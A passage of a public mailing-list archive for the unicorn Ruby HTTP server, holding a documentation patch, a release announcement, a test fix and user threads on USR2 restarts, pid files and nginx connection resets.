-unicorn, Rainbows! is far more ambitious and has seen little real-world
-usage.
diff --git a/README b/README
index bd626e9..dc121d3 100644
--- a/README
+++ b/README
@@ -1,10 +1,10 @@
-= Unicorn: Rack HTTP server for fast clients and Unix
+= unicorn: Rack HTTP server for fast clients and Unix
 
-\Unicorn is an HTTP server for Rack applications designed to only serve
+unicorn is an HTTP server for Rack applications designed to only serve
 fast clients on low-latency, high-bandwidth connections and take
 advantage of features in Unix/Unix-like kernels.  Slow clients should
 only be served by placing a reverse proxy capable of fully buffering
-both the the request and response in between \Unicorn and slow clients.
+both the the request and response in between unicorn and slow clients.
 
 == Features
 
@@ -15,9 +15,9 @@ both the the request and response in between \Unicorn and slow clients.
 * Compatible with Ruby 1.9.3 and later.
   unicorn 4.8.x will remain supported for Ruby 1.8 users.
 
-* Process management: \Unicorn will reap and restart workers that
+* Process management: unicorn will reap and restart workers that
   die from broken apps.  There is no need to manage multiple processes
-  or ports yourself.  \Unicorn can spawn and manage any number of
+  or ports yourself.  unicorn can spawn and manage any number of
   worker processes you choose to scale to your backend.
 
 * Load balancing is done entirely by the operating system kernel.
@@ -33,11 +33,11 @@ both the the request and response in between \Unicorn and slow clients.
 * Builtin reopening of all log files in your application via
   USR1 signal.  This allows logrotate to rotate files atomically and
   quickly via rename instead of the racy and slow copytruncate method.
-  \Unicorn also takes steps to ensure multi-line log entries from one
+  unicorn also takes steps to ensure multi-line log entries from one
   request all stay within the same file.
 
 * nginx-style binary upgrades without losing connections.
-  You can upgrade \Unicorn, your entire application, libraries
+  You can upgrade unicorn, your entire application, libraries
   and even your Ruby interpreter without dropping clients.
 
 * before_fork and after_fork hooks in case your application
@@ -60,15 +60,15 @@ both the the request and response in between \Unicorn and slow clients.
 
 == License
 
-\Unicorn is copyright 2009 by all contributors (see logs in git).
+unicorn is copyright 2009 by all contributors (see logs in git).
 It is based on Mongrel 1.1.5.
 Mongrel is copyright 2007 Zed A. Shaw and contributors.
 
-\Unicorn is licensed under (your choice) of the GPLv2 or later
+unicorn is licensed under (your choice) of the GPLv2 or later
 (GPLv3+ preferred), or Ruby (1.8)-specific terms.
 See the included LICENSE file for details.
 
-\Unicorn is 100% Free Software.
+unicorn is 100% Free Software.
 
 == Install
 
@@ -108,17 +108,17 @@ In RAILS_ROOT, run:
 
   unicorn_rails
 
-\Unicorn will bind to all interfaces on TCP port 8080 by default.
+unicorn will bind to all interfaces on TCP port 8080 by default.
 You may use the +--listen/-l+ switch to bind to a different
 address:port or a UNIX socket.
 
 === Configuration File(s)
 
-\Unicorn will look for the config.ru file used by rackup in APP_ROOT.
+unicorn will look for the config.ru file used by rackup in APP_ROOT.
 
-For deployments, it can use a config file for \Unicorn-specific options
+For deployments, it can use a config file for unicorn-specific options
 specified by the +--config-file/-c+ command-line switch.  See
-Unicorn::Configurator for the syntax of the \Unicorn-specific options.
+Unicorn::Configurator for the syntax of the unicorn-specific options.
 The default settings are designed for maximum out-of-the-box
 compatibility with existing applications.
 
@@ -130,7 +130,7 @@ supported.  Run `unicorn -h` to see command-line options.
 There is NO WARRANTY whatsoever if anything goes wrong, but
 {let us know}[link:ISSUES.html] and we'll try our best to fix it.
 
-\Unicorn is designed to only serve fast clients either on the local host
+unicorn is designed to only serve fast clients either on the local host
 or a fast LAN.  See the PHILOSOPHY and DESIGN documents for more details
 regarding this.
 
@@ -140,6 +140,6 @@ All feedback (bug reports, user/development dicussion, patches, pull
 requests) go to the mailing list/newsgroup.  See the ISSUES document for
 information on the {mailing list}[mailto:unicorn-public@bogomips.org].
 
-For the latest on \Unicorn releases, you may also finger us at
+For the latest on unicorn releases, you may also finger us at
 unicorn@bogomips.org or check our NEWS page (and subscribe to our Atom
 feed).
diff --git a/Sandbox b/Sandbox
index a6c3fe7..997b92f 100644
--- a/Sandbox
+++ b/Sandbox
@@ -1,4 +1,4 @@
-= Tips for using \Unicorn with Sandbox installation tools
+= Tips for using unicorn with Sandbox installation tools
 
 Since unicorn includes executables and is usually used to start a Ruby
 process, there are certain caveats to using it with tools that sandbox
diff --git a/TUNING b/TUNING
index 6a6d7db..247090b 100644
--- a/TUNING
+++ b/TUNING
@@ -1,10 +1,10 @@
-= Tuning \Unicorn
+= Tuning unicorn
 
-\Unicorn performance is generally as good as a (mostly) Ruby web server
+unicorn performance is generally as good as a (mostly) Ruby web server
 can provide.  Most often the performance bottleneck is in the web
 application running on Unicorn rather than Unicorn itself.
 
-== \Unicorn Configuration
+== unicorn Configuration
 
 See Unicorn::Configurator for details on the config file format.
 +worker_processes+ is the most-commonly needed tuning parameter.
@@ -14,7 +14,7 @@ See Unicorn::Configurator for details on the config file format.
 * worker_processes should be scaled to the number of processes your
   backend system(s) can support.  DO NOT scale it to the number of
   external network clients your application expects to be serving.
-  \Unicorn is NOT for serving slow clients, that is the job of nginx.
+  unicorn is NOT for serving slow clients, that is the job of nginx.
 
 * worker_processes should be *at* *least* the number of CPU cores on
   a dedicated server (unless you do not have enough memory).
@@ -58,7 +58,7 @@ See Unicorn::Configurator for details on the config file format.
 * UNIX domain sockets are slightly faster than TCP sockets, but only
   work if nginx is on the same machine.
 
-== Other \Unicorn settings
+== Other unicorn settings
 
 * Setting "preload_app true" can allow copy-on-write-friendly GC to
   be used to save memory.  It will probably not work out of the box with
diff --git a/examples/nginx.conf b/examples/nginx.conf
index a68fe6f..0583c1f 100644
--- a/examples/nginx.conf
+++ b/examples/nginx.conf
@@ -1,5 +1,5 @@
 # This is example contains the bare mininum to get nginx going with
-# Unicorn or Rainbows! servers.  Generally these configuration settings
+# unicorn servers.  Generally these configuration settings
 # are applicable to other HTTP application servers (and not just Ruby
 # ones), so if you have one working well for proxying another app
 # server, feel free to continue using it.
@@ -44,8 +44,8 @@ http {
   # click tracking!
   access_log /path/to/nginx.access.log combined;
 
-  # you generally want to serve static files with nginx since neither
-  # Unicorn nor Rainbows! is optimized for it at the moment
+  # you generally want to serve static files with nginx since
+  # unicorn is not and will never be optimized for it
   sendfile on;
 
   tcp_nopush on; # off may be better for *some* Comet/long-poll stuff
@@ -67,10 +67,10 @@ http {
              text/javascript application/x-javascript
              application/atom+xml;
 
-  # this can be any application server, not just Unicorn/Rainbows!
+  # this can be any application server, not just unicorn
   upstream app_server {
     # fail_timeout=0 means we always retry an upstream even if it failed
-    # to return a good HTTP response (in case the Unicorn master nukes a
+    # to return a good HTTP response (in case the unicorn master nukes a
     # single worker for timing out).
 
     # for UNIX domain socket setups:
@@ -132,12 +132,11 @@ http {
       # redirects, we set the Host: header above already.
       proxy_redirect off;
 
-      # set "proxy_buffering off" *only* for Rainbows! when doing
-      # Comet/long-poll/streaming.  It's also safe to set if you're using
-      # only serving fast clients with Unicorn + nginx, but not slow
-      # clients.  You normally want nginx to buffer responses to slow
-      # clients, even with Rails 3.1 streaming because otherwise a slow
-      # client can become a bottleneck of Unicorn.
+      # It's also safe to set if you're using only serving fast clients
+      # with unicorn + nginx, but not slow clients.  You normally want
+      # nginx to buffer responses to slow clients, even with Rails 3.1
+      # streaming because otherwise a slow client can become a bottleneck
+      # of unicorn.
       #
       # The Rack application may also set "X-Accel-Buffering (yes|no)"
       # in the response headers do disable/enable buffering on a
diff --git a/ext/unicorn_http/unicorn_http.rl b/ext/unicorn_http/unicorn_http.rl
index a5f069d..046ccb5 100644
--- a/ext/unicorn_http/unicorn_http.rl
+++ b/ext/unicorn_http/unicorn_http.rl
@@ -38,7 +38,7 @@ static VALUE set_maxhdrlen(VALUE self, VALUE len)
   return UINT2NUM(MAX_HEADER_LEN = NUM2UINT(len));
 }
 
-/* keep this small for Rainbows! since every client has one */
+/* keep this small for other servers (e.g. yahns) since every client has one */
 struct http_parser {
   int cs; /* Ragel internal state */
   unsigned int flags;
diff --git a/lib/unicorn.rb b/lib/unicorn.rb
index 9fdcb8e..b0e6bd1 100644
--- a/lib/unicorn.rb
+++ b/lib/unicorn.rb
@@ -10,10 +10,10 @@ require 'kgio'
 # enough functionality to service web application requests fast as possible.
 # :startdoc:
 
-# \Unicorn exposes very little of an user-visible API and most of its
-# internals are subject to change.  \Unicorn is designed to host Rack
+# unicorn exposes very little of an user-visible API and most of its
+# internals are subject to change.  unicorn is designed to host Rack
 # applications, so applications should be written against the Rack SPEC
-# and not \Unicorn internals.
+# and not unicorn internals.
 module Unicorn
 
   # Raised inside TeeInput when a client closes the socket inside the
diff --git a/lib/unicorn/configurator.rb b/lib/unicorn/configurator.rb
index 02f6b6b..4da19bb 100644
--- a/lib/unicorn/configurator.rb
+++ b/lib/unicorn/configurator.rb
@@ -1,7 +1,7 @@
 # -*- encoding: binary -*-
 require 'logger'
 
-# Implements a simple DSL for configuring a \Unicorn server.
+# Implements a simple DSL for configuring a unicorn server.
 #
 # See http://unicorn.bogomips.org/examples/unicorn.conf.rb and
 # http://unicorn.bogomips.org/examples/unicorn.conf.minimal.rb
@@ -282,20 +282,19 @@ class Unicorn::Configurator
   #   Setting this to +true+ can make streaming responses in Rails 3.1
   #   appear more quickly at the cost of slightly higher bandwidth usage.
   #   The effect of this option is most visible if nginx is not used,
-  #   but nginx remains highly recommended with \Unicorn.
+  #   but nginx remains highly recommended with unicorn.
   #
   #   This has no effect on UNIX sockets.
   #
-  #   Default: +true+ (Nagle's algorithm disabled) in \Unicorn,
-  #   +true+ in Rainbows!  This defaulted to +false+ in \Unicorn
-  #   3.x
+  #   Default: +true+ (Nagle's algorithm disabled) in unicorn
+  #   This defaulted to +false+ in unicorn 3.x
   #
   # [:tcp_nopush => true or false]
   #
   #   Enables/disables TCP_CORK in Linux or TCP_NOPUSH in FreeBSD
   #
   #   This prevents partial TCP frames from being sent out and reduces
-  #   wakeups in nginx if it is on a different machine.  Since \Unicorn
+  #   wakeups in nginx if it is on a different machine.  Since unicorn
   #   is only designed for applications that send the response body
   #   quickly without keepalive, sockets will always be flushed on close
   #   to prevent delays.
@@ -303,7 +302,7 @@ class Unicorn::Configurator
   #   This has no effect on UNIX sockets.
   #
   #   Default: +false+
-  #   This defaulted to +true+ in \Unicorn 3.4 - 3.7
+  #   This defaulted to +true+ in unicorn 3.4 - 3.7
   #
   # [:ipv6only => true or false]
   #
@@ -387,12 +386,10 @@ class Unicorn::Configurator
   #   and +false+ or +nil+ is synonymous for a value of zero.
   #
   #   A value of +1+ is a good optimization for local networks
-  #   and trusted clients.  For Rainbows! and Zbatery users, a higher
-  #   value (e.g. +60+) provides more protection against some
-  #   denial-of-service attacks.  There is no good reason to ever
-  #   disable this with a +zero+ value when serving HTTP.
+  #   and trusted clients.  There is no good reason to ever
+  #   disable this with a +zero+ value with unicorn.
   #
-  #   Default: 1 retransmit for \Unicorn, 60 for Rainbows! 0.95.0\+
+  #   Default: 1
   #
   # [:accept_filter => String]
   #
@@ -401,8 +398,7 @@ class Unicorn::Configurator
   #   This enables either the "dataready" or (default) "httpready"
   #   accept() filter under FreeBSD.  This is intended as an
   #   optimization to reduce context switches with common GET/HEAD
-  #   requests.  For Rainbows! and Zbatery users, this provides
-  #   some protection against certain denial-of-service attacks, too.
+  #   requests.
   #
   #   There is no good reason to change from the default.
   #
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 0f97516..3dbfd3e 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -7,8 +7,8 @@
 #
 # Users do not need to know the internals of this class, but reading the
 # {source}[http://bogomips.org/unicorn.git/tree/lib/unicorn/http_server.rb]
-# is education for programmers wishing to learn how \Unicorn works.
-# See Unicorn::Configurator for information on how to configure \Unicorn.
+# is education for programmers wishing to learn how unicorn works.
+# See Unicorn::Configurator for information on how to configure unicorn.
 class Unicorn::HttpServer
   # :stopdoc:
   attr_accessor :app, :timeout, :worker_processes,
diff --git a/lib/unicorn/socket_helper.rb b/lib/unicorn/socket_helper.rb
index 812ac53..df8315e 100644
--- a/lib/unicorn/socket_helper.rb
+++ b/lib/unicorn/socket_helper.rb
@@ -5,14 +5,12 @@ require 'socket'
 module Unicorn
   module SocketHelper
 
-    # internal interface, only used by Rainbows!/Zbatery
+    # internal interface
     DEFAULTS = {
       # The semantics for TCP_DEFER_ACCEPT changed in Linux 2.6.32+
       # with commit d1b99ba41d6c5aa1ed2fc634323449dd656899e9
-      # This change shouldn't affect Unicorn users behind nginx (a
-      # value of 1 remains an optimization), but Rainbows! users may
-      # want to use a higher value on Linux 2.6.32+ to protect against
-      # denial-of-service attacks
+      # This change shouldn't affect unicorn users behind nginx (a
+      # value of 1 remains an optimization).
       :tcp_defer_accept => 1,
 
       # FreeBSD, we need to override this to 'dataready' if we
diff --git a/lib/unicorn/util.rb b/lib/unicorn/util.rb
index c7784bd..2f8bfeb 100644
--- a/lib/unicorn/util.rb
+++ b/lib/unicorn/util.rb
@@ -1,7 +1,7 @@
 # -*- encoding: binary -*-
 
 require 'fcntl'
-module Unicorn::Util
+module Unicorn::Util # :nodoc:
 
 # :stopdoc:
   def self.is_log?(fp)
diff --git a/lib/unicorn/worker.rb b/lib/unicorn/worker.rb
index b3f8afe..6748a2f 100644
--- a/lib/unicorn/worker.rb
+++ b/lib/unicorn/worker.rb
@@ -3,8 +3,8 @@ require "raindrops"
 
 # This class and its members can be considered a stable interface
 # and will not change in a backwards-incompatible fashion between
-# releases of \Unicorn.  Knowledge of this class is generally not
-# not needed for most users of \Unicorn.
+# releases of unicorn.  Knowledge of this class is generally not
+# not needed for most users of unicorn.
 #
 # Some users may want to access it in the before_fork/after_fork hooks.
 # See the Unicorn::Configurator RDoc for examples.
-- 
EW


^ permalink raw reply related	[relevance 2%]

* [ANN] unicorn 5.0.0.pre2 - another prerelease!
  @ 2015-07-06 21:41  9% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-07-06 21:41 UTC (permalink / raw)
  To: unicorn-public

There is a minor TCP socket options are now applied to inherited
sockets, and we have native support for inheriting sockets from
systemd (by emulating the sd_listen_fds(3) function).

Dynamic changes in the application to Rack::Utils::HTTP_STATUS
codes is now supported, so you can use your own custom status
lines.

Ruby 2.2 and later is now favored for performance.
Optimizations by using constants which made sense in earlier
versions of Ruby are gone: so users of old Ruby versions
will see performance regressions.  Ruby 2.2 users should
see the same or better performance, and we have less code
as a result.

* doc: update some invalid URLs
* apply TCP socket options on inherited sockets
* reflect changes in Rack::Utils::HTTP_STATUS_CODES
* reduce constants and optimize for Ruby 2.2
* http_response: reduce size of multi-line header path
* emulate sd_listen_fds for systemd support
* test/unit/test_response.rb: compatibility with older test-unit

This also includes all changes in unicorn 5.0.0.pre1:

http://bogomips.org/unicorn-public/m/20150615225652.GA16164@dcvr.yhbt.net.html

-- 
EW

^ permalink raw reply	[relevance 9%]

* [PATCH] test/unit/test_response.rb: compatibility with older test-unit
@ 2015-07-05  0:31  4% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-07-05  0:31 UTC (permalink / raw)
  To: unicorn-public; +Cc: Eric Wong

assert_predicate really isn't that useful even if it seems
preferred in another project I work on.  Avoid having folks
download the latest test-unit if they're on an old version of
Ruby (e.g. 1.9.3) which bundled it.
---
 test/unit/test_response.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/test/unit/test_response.rb b/test/unit/test_response.rb
index 1e9d74a..0b14d59 100644
--- a/test/unit/test_response.rb
+++ b/test/unit/test_response.rb
@@ -94,7 +94,7 @@ class ResponseTest < Test::Unit::TestCase
     assert_equal "HTTP/1.1 200 HI\r\n", r.gets
     r.read # just drain the pipe
     pid, status = Process.waitpid2(pid)
-    assert_predicate status, :success?
+    assert status.success?, status.inspect
   ensure
     r.close
     w.close unless w.closed?
-- 
EW


^ permalink raw reply related	[relevance 4%]

* Does the the environment is preserved on USR2?
@ 2015-06-26 22:18  4% Bráulio Bhavamitra
  0 siblings, 0 replies; 200+ results
From: Bráulio Bhavamitra @ 2015-06-26 22:18 UTC (permalink / raw)
  To: unicorn-public

Hello,

I use the ruby environment variable RUBY_GC_MALLOC_LIMIT='90000000' to
start unicorn inside a init.d service and I get the impression that
when I run kill -USR2 `cat tmp/pids/unicorn.pid` in another shell this
variable is no longer used.

So the new master started by USR2 preserve the environment from the
old master or the environment variables need be set on the shell it is
invoked?

cheers,
bráulio

-- 
"Lute pela sua ideologia. Seja um com sua ideologia. Viva pela sua
ideologia. Morra por sua ideologia" P.R. Sarkar

EITA - Educação, Informação e Tecnologias para Autogestão
http://cirandas.net/brauliobo
http://eita.org.br

"Paramapurusha é meu pai e Parama Prakriti é minha mãe. O universo é
meu lar e todos nós somos cidadãos deste cosmo. Este universo é a
imaginação da Mente Macrocósmica, e todas as entidades estão sendo
criadas, preservadas e destruídas nas fases de extroversão e
introversão do fluxo imaginativo cósmico. No âmbito pessoal, quando
uma pessoa imagina algo em sua mente, naquele momento, essa pessoa é a
única proprietária daquilo que ela imagina, e ninguém mais. Quando um
ser humano criado mentalmente caminha por um milharal também
imaginado, a pessoa imaginada não é a propriedade desse milharal, pois
ele pertence ao indivíduo que o está imaginando. Este universo foi
criado na imaginação de Brahma, a Entidade Suprema, por isso a
propriedade deste universo é de Brahma, e não dos microcosmos que
também foram criados pela imaginação de Brahma. Nenhuma propriedade
deste mundo, mutável ou imutável, pertence a um indivíduo em
particular; tudo é o patrimônio comum de todos."
Restante do texto em
http://cirandas.net/brauliobo/blog/a-problematica-de-hoje-em-dia

^ permalink raw reply	[relevance 4%]

* possible errors reading mailing list archives
@ 2015-04-07 23:22  4% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-04-07 23:22 UTC (permalink / raw)
  To: unicorn-public

If you hit any errors or truncated/corrupted responses when reading ML
archives at http://bogomips.org/unicorn-public/ it's probably because of
a bug in the new rack.hijack-based proxy in front of the prefork Apache2
instance hosting.

Drop me (or this list) a plain-text mail with the URL(s) and any info
about your client/connection that's broken for you

Previously, it was yahns using a synchronous (Rack, no-hijack) proxy
from yahns in the extras/proxy_pass.rb file[2]

before:
  yahns:extras/proxy_pass.rb -> varnish -> mpm_prefork+mod_perl

after:
  yahns:lib/yahns/proxy_pass.rb -> varnish -> mpm_prefork+mod_perl

yahns mailing list archives with all the relevant commits are here:
http://yhbt.net/yahns-public/

In case the HTTP portion of the archives get hosed, archives of the
mailing lists are still git clonable with ssoma[1] (or just using
"git clone")

	git://yhbt.net/yahns-public
	git://bogomips.org/unicorn-public

In case the server is gets completely hosed by the yahns proxy_pass
changes, archives are still readable at:

	https://www.mail-archive.com/yahns-public@yhbt.net/
	https://www.mail-archive.com/unicorn-public@bogomips.org/

Finally, in case you haven't realized by now; unicorn has always been a
rip-off of Apache(1|2) prefork design.  The major difference is the
marketing of unicorn always focused on the shortcomings of the design :>

So any fully-buffering reverse proxy such as nginx or yahns/proxy_pass
which protects one preforking server implementation from slow clients
will protect another...

[1] http://ssoma.public-inbox.org/
[2] git clone git://yhbt.net/yahns

^ permalink raw reply	[relevance 4%]

* Re: nginx reverse proxy getting ECONNRESET
  2015-03-24 23:04  0%     ` Michael Fischer
@ 2015-03-24 23:23  0%       ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-03-24 23:23 UTC (permalink / raw)
  To: Michael Fischer; +Cc: unicorn-public

Michael Fischer <mfischer@zendesk.com> wrote:
> On Tue, Mar 24, 2015 at 10:59 PM, Eric Wong <e@80x24.org> wrote:
> > Another likely explanation might be you're not draining rack.input every
> > request, since unicorn does lazy reads off the socket to prevent
> > rejected uploads from wasting disk I/O[1]
> >
> > So you can send a bigger POST request with my example to maybe
> > reproduce the issue.
> >
> > [1] you can use the Unicorn::PrereadInput middleware to forcibly
> >     disable the lazy read:
> >     http://unicorn.bogomips.org/Unicorn/PrereadInput.html
> 
> Actually, these are quite large POST requests we're attempting to
> service (on the order of 4MB).  Can you elaborate on the mechanism in
> play here?

Unlike a lot of servers, unicorn will not attempt to buffer request
bodies on its own.  You'll need to actually process the POST request in
your app (via Rack/Rails/whatever accessing env["rack.input"]).

The PrereadInput middleware makes it behave like other servers
(at the cost of being slower if a request is worthless and rejected)

So there might be data sitting on the socket if your application
processing returns a response before it parsed the POST request.

In this case, the ECONNRESET messages are harmless and saves your
Ruby process from GC thrashing.

Actually, you can try setting up a Rack::Lobster instance but sending
a giant POST request?

------------- config.ru --------------
require 'rack/lobster'
run Rack::Lobster.new
--------------------------------------

^ permalink raw reply	[relevance 0%]

* Re: nginx reverse proxy getting ECONNRESET
  2015-03-24 22:59  5%   ` Eric Wong
@ 2015-03-24 23:04  0%     ` Michael Fischer
  2015-03-24 23:23  0%       ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Michael Fischer @ 2015-03-24 23:04 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

On Tue, Mar 24, 2015 at 10:59 PM, Eric Wong <e@80x24.org> wrote:
> Another likely explanation might be you're not draining rack.input every
> request, since unicorn does lazy reads off the socket to prevent
> rejected uploads from wasting disk I/O[1]
>
> So you can send a bigger POST request with my example to maybe
> reproduce the issue.
>
> [1] you can use the Unicorn::PrereadInput middleware to forcibly
>     disable the lazy read:
>     http://unicorn.bogomips.org/Unicorn/PrereadInput.html

Actually, these are quite large POST requests we're attempting to
service (on the order of 4MB).  Can you elaborate on the mechanism in
play here?

Thanks,

--Michael


^ permalink raw reply	[relevance 0%]

* Re: nginx reverse proxy getting ECONNRESET
  @ 2015-03-24 22:59  5%   ` Eric Wong
  2015-03-24 23:04  0%     ` Michael Fischer
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2015-03-24 22:59 UTC (permalink / raw)
  To: Michael Fischer; +Cc: unicorn-public

Another likely explanation might be you're not draining rack.input every
request, since unicorn does lazy reads off the socket to prevent
rejected uploads from wasting disk I/O[1]

So you can send a bigger POST request with my example to maybe
reproduce the issue.

[1] you can use the Unicorn::PrereadInput middleware to forcibly
    disable the lazy read:
    http://unicorn.bogomips.org/Unicorn/PrereadInput.html

^ permalink raw reply	[relevance 5%]

* Re: On USR2, new master runs with same PID
  2015-03-12  1:45  4% ` Eric Wong
@ 2015-03-12  6:26  0%   ` Kevin Yank
  0 siblings, 0 replies; 200+ results
From: Kevin Yank @ 2015-03-12  6:26 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

[-- Attachment #1: Type: text/plain, Size: 5164 bytes --]

Thanks for your help, Eric!

> On 12 Mar 2015, at 12:45 pm, Eric Wong <e@80x24.org> wrote:
> 
> Kevin Yank <kyank@avalanche.com.au> wrote:
>> When I send USR2 to the master process (PID 19216 in this example), I
>> get the following in the Unicorn log:
>> 
>> I, [2015-03-11T23:47:33.992274 #6848]  INFO -- : executing ["/srv/ourapp/shared/bundle/ruby/2.2.0/bin/unicorn", "/srv/ourapp/current/config.ru", "-Dc", "/srv/ourapp/shared/config/unicorn.rb", {10=>#<Kgio::UNIXServer:/srv/ourapp/shared/sockets/unicorn.sock>}] (in /srv/ourapp/releases/a0e8b5df474ad5129200654f92a76af00a750f47)
>> I, [2015-03-11T23:47:36.504235 #6848]  INFO -- : inherited addr=/srv/ourapp/shared/sockets/unicorn.sock fd=10
>> /srv/ourapp/shared/bundle/ruby/2.2.0/gems/unicorn-4.8.1/lib/unicorn/http_server.rb:206:in `pid=': Already running on PID:19216 (or pid=/srv/ourapp/shared/pids/unicorn.pid is stale) (ArgumentError)
> 
> Nothing suspicious until the above line...

That’s right.

>> And when I check, indeed, there is now unicorn.pid and
>> unicorn.pid.oldbin, both containing 19216.
> 
> Any chance you have a process manager or something else creating the
> (non-.oldbin) pid file behind unicorn's back?

It’s possible; I’m using eye (https://github.com/kostya/eye) as a process monitor. I’m not aware of it writing .pid files for processes that self-daemonize like Unicorn, though. And once one of my servers “goes bad” (i.e. Unicorn starts failing to restart in response to a USR2), it does so 100% consistently until I stop and restart Unicorn entirely. Based on that, I don’t believe it’s a race condition where my process monitor is slipping in a new unicorn.pid file some of the time.

> Can you check your process table to ensure there's not multiple
> unicorn instances running off the same config and pid files, too?

As far as I can tell, I have some servers that have gotten themselves into this “USR2 restart fails” state, while others are working just fine. In both cases, the Unicorn process tree (as show in htop) looks like this “at rest” (i.e. no deployments/restarts in progress):

unicorn master
`- unicorn master
`- unicorn worker[2]
|  `- unicorn worker[2]
`- unicorn worker[1]
|  `- unicorn worker[1]
`- unicorn worker[0]
   `- unicorn worker[0]

At first glance I’d definitely say it appears that I have two masters running from the same config files. However, there’s only one unicorn.pid file of course (the root process in the tree above), and when I try to kill -TERM the master process that doesn’t have a .pid file, the entire process tree exits. Am I misinterpreting the process table? Is this process list actually normal?

Thus far I’ve been unable to find any difference in state between a properly-behaving server and a misbehaving server, apart from the behaviour of the Unicorn master when it receives a USR2.

> Also, were there other activity (another USR2 or HUP) in the logs
> a few seconds beforehand?

No, didn’t see anything like that (and I was looking for it).

> What kind of filesystem / kernel is the pid file on?

EXT4 / Ubuntu Server 12.04 LTS

> A network FS or anything without the consistency guarantees provided
> by POSIX would not work for pid files.

Given my environment above, I should be OK, right?

> pid files are unfortunately prone to to nasty race conditions,
> but I'm not sure what you're seeing happens very often.

This has been happening pretty frequently across multiple server instances, and again once it starts happening on an instance, it keeps happening 100% of the time (until I restart Unicorn completely). So it’s not a rare edge case.

> -------------------8<-------------------
>>  sleep 10
>> 
>>  old_pid = "#{server.config[:pid]}.oldbin"
>>  if File.exists?(old_pid) && server.pid != old_pid
>>    begin
>>      Process.kill("QUIT", File.read(old_pid).to_i)
>>    rescue Errno::ENOENT, Errno::ESRCH
>>      # someone else did our job for us
>>    end
>>  end
> -------------------8<-------------------
> 
> I'd get rid of that hunk starting with the "sleep 10" (at least while
> debugging this issue).

If I simply delete this hunk, I’ll have old masters left running on my servers because they’ll never get sent the QUIT signal. I can definitely remove it temporarily (and kill the old master myself) while debugging, though.

> If you did a USR2 previously, maybe it could
> affect the current USR2 upgrade process.  Sleeping so long in the master
> like that is pretty bad it throws off timing and delays signal handling.

I’d definitely like to get rid of the sleep, as my restarts definitely feel slow. I’m not clear on what a better approach would be, though.

> That's a pretty fragile config and I regret ever including it in the
> example config files

Any better examples/docs you’d recommend I consult for guidance? Or is expecting to achieve a robust zero-downtime restart using before_fork/after_fork hooks unrealistic?

--
Kevin Yank
Chief Technology Officer, Avalanche Technology Group
http://avalanche.com.au/

ph: +61 4 2241 0083




^ permalink raw reply	[relevance 0%]

* Re: On USR2, new master runs with same PID
  @ 2015-03-12  1:45  4% ` Eric Wong
  2015-03-12  6:26  0%   ` Kevin Yank
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2015-03-12  1:45 UTC (permalink / raw)
  To: Kevin Yank; +Cc: unicorn-public

Kevin Yank <kyank@avalanche.com.au> wrote:
> Having recently migrated our Rails app to MRI 2.2.0 (which may or may
> not be related), we’re experiencing problems with our Unicorn
> zero-downtime restarts.
> 
> When I send USR2 to the master process (PID 19216 in this example), I
> get the following in the Unicorn log:
>
> I, [2015-03-11T23:47:33.992274 #6848]  INFO -- : executing ["/srv/ourapp/shared/bundle/ruby/2.2.0/bin/unicorn", "/srv/ourapp/current/config.ru", "-Dc", "/srv/ourapp/shared/config/unicorn.rb", {10=>#<Kgio::UNIXServer:/srv/ourapp/shared/sockets/unicorn.sock>}] (in /srv/ourapp/releases/a0e8b5df474ad5129200654f92a76af00a750f47)
> I, [2015-03-11T23:47:36.504235 #6848]  INFO -- : inherited addr=/srv/ourapp/shared/sockets/unicorn.sock fd=10
> /srv/ourapp/shared/bundle/ruby/2.2.0/gems/unicorn-4.8.1/lib/unicorn/http_server.rb:206:in `pid=': Already running on PID:19216 (or pid=/srv/ourapp/shared/pids/unicorn.pid is stale) (ArgumentError)

Nothing suspicious until the above line...

<snip>

> And when I check, indeed, there is now unicorn.pid and
> unicorn.pid.oldbin, both containing 19216.
> 
> What could cause this situation to arise?

Any chance you have a process manager or something else creating the
(non-.oldbin) pid file behind unicorn's back?

Can you check your process table to ensure there's not multiple
unicorn instances running off the same config and pid files, too?

Also, were there other activity (another USR2 or HUP) in the logs
a few seconds beforehand?

What kind of filesystem / kernel is the pid file on?
A network FS or anything without the consistency guarantees provided
by POSIX would not work for pid files.

pid files are unfortunately prone to to nasty race conditions,
but I'm not sure what you're seeing happens very often.

Likewise, the check for stale Unix domain socket paths at startup is
inevitably racy, too, but the window is usually small enough to be
unnoticeable.  But yes, just in case, check the process table to make
sure there aren't multiple, non-related masters running on off the
same paths.

<snip>

> before_fork do |server, worker|
>   ActiveRecord::Base.connection.disconnect!

-------------------8<-------------------
>   sleep 10
> 
>   old_pid = "#{server.config[:pid]}.oldbin"
>   if File.exists?(old_pid) && server.pid != old_pid
>     begin
>       Process.kill("QUIT", File.read(old_pid).to_i)
>     rescue Errno::ENOENT, Errno::ESRCH
>       # someone else did our job for us
>     end
>   end
-------------------8<-------------------

I'd get rid of that hunk starting with the "sleep 10" (at least while
debugging this issue).  If you did a USR2 previously, maybe it could
affect the current USR2 upgrade process.  Sleeping so long in the master
like that is pretty bad it throws off timing and delays signal handling.

That's a pretty fragile config and I regret ever including it in the
example config files

^ permalink raw reply	[relevance 4%]

* Re: Request Queueing after deploy + USR2 restart
  2015-03-05 17:28  0%                     ` Sarkis Varozian
  2015-03-05 17:31  0%                       ` Bráulio Bhavamitra
@ 2015-03-05 17:32  0%                       ` Bráulio Bhavamitra
  1 sibling, 0 replies; 200+ results
From: Bráulio Bhavamitra @ 2015-03-05 17:32 UTC (permalink / raw)
  To: Sarkis Varozian; +Cc: Eric Wong, Michael Fischer, unicorn-public

I also use newrelic and never saw this grey part...

On Thu, Mar 5, 2015 at 2:28 PM, Sarkis Varozian <svarozian@gmail.com> wrote:

> Braulio,
>
> Are you referring to the vertical grey line? That is the deployment event.
> The part that spikes in the first graph is request queue which is a bit
> different on newrelic:
